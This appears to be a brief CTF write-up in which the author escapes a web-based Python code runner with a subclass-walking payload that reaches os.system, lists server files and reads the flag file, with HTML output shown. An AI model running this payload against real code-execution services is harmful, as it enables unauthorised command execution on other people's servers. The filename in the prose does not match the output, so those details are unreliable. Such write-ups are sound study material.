

This is like PyJail challs but in web version, so to solve this. Im using one of the PyJail payload:

```
print(dict.__class__.__base__.__subclasses__()[130].__init__.__globals__["sys"].modules["os"].system("ls -la"))
```

And the result was

```
<body>
  <nav class="navbar">
    <ul>
      <li>Python code runner</li>
      <li><a href="/uploads/">Upload</a></li>
    </ul>
  </nav>
  <div style="padding: 10px;">
    <p>Your code:</p>
    <pre>
    <code>
      print(dict.__class__.__base__.__subclasses__()[130].__init__.__globals__[&#34;sys&#34;].modules[&#34;os&#34;].system(&#34;ls&#34;))
    </code>
    </pre>
    <p>Results of code:</p>
    <pre>
    <code>
      app.py
      Dockerfile
      flag-f5740e81-d6f6-44cc-978f-015718654d70.txt
      run.sh
      Solution
      static
      templates
      uploads
      0
    </code>
    </pre>
  </div>
</body>
```

And then change the ls command to cat flag-0f8794c6-9e3b-4458-8ee6-eeb6b3a34a68.txt to obtain the flag

```
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      <li>Python code runner</li>
      <li><a href="/uploads/">Upload</a></li>
    </ul>
  </nav>
  <div style="padding: 10px;">
    <p>Your code:</p>
    <pre>
    <code>
      print(dict.__class__.__base__.__subclasses__()[130].__init__.__globals__[&#34;sys&#34;].modules[&#34;os&#34;].system(&#34;cat flag-f5740e81-d6f6-44cc-978f-015718654d70.txt&#34;))
    </code>
    </pre>
    <p>Results of code:</p>
    <pre>
    <code>
      flag{fake_flag}0
    </code>
    </pre>
  </div>
</body>
```